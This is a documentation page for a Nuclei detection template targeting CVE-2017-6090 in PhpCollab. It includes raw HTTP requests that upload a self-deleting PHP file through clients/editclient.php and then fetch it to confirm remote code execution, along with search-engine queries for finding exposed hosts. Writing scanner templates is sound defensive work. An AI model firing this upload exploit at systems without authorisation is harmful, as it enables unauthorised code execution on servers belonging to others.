Skip to content
Nuclei Templates

PhpColl 2.5.1 Arbitrary File Upload

ID: CVE-2017-6090

Severity: high

Author: pikpikcu

Tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive

Description

Section titled “Description”

PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.

YAML Source

Section titled “YAML Source”
id: CVE-2017-6090


info:
  name: PhpColl 2.5.1 Arbitrary File Upload
  author: pikpikcu
  severity: high
  description: PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system.
  remediation: |
    Apply the latest patch or upgrade to a newer version of PhpColl to mitigate this vulnerability.
  reference:
    - https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-6090
    - https://www.exploit-db.com/exploits/42934/
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2017-6090
    cwe-id: CWE-434
    epss-score: 0.97204
    epss-percentile: 0.99825
    cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: phpcollab
    product: phpcollab
    shodan-query:
      - http.title:"PhpCollab"
      - http.title:"phpcollab"
    fofa-query: title="phpcollab"
    google-query: intitle:"phpcollab"
  tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive
variables:
  string: "CVE-2017-6090"


http:
  - raw:
      - |
        POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137


        -----------------------------154934846911423734231554128137
        Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
        Content-Type: application/x-php


        <?php echo md5("{{string}}");unlink(__FILE__);?>


        -----------------------------154934846911423734231554128137--
      - |
        GET /logos_clients/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{md5(string)}}'


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e3a4dc556c6924d836c7e5146d67eed6a1247fb1f159be53b8ff6a304c60dbac02201ab3ebee860f4023c6abc6b08c0f0f0d3c780de36e70514a9a4b481f03477e30:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-6090.yaml"

View on Github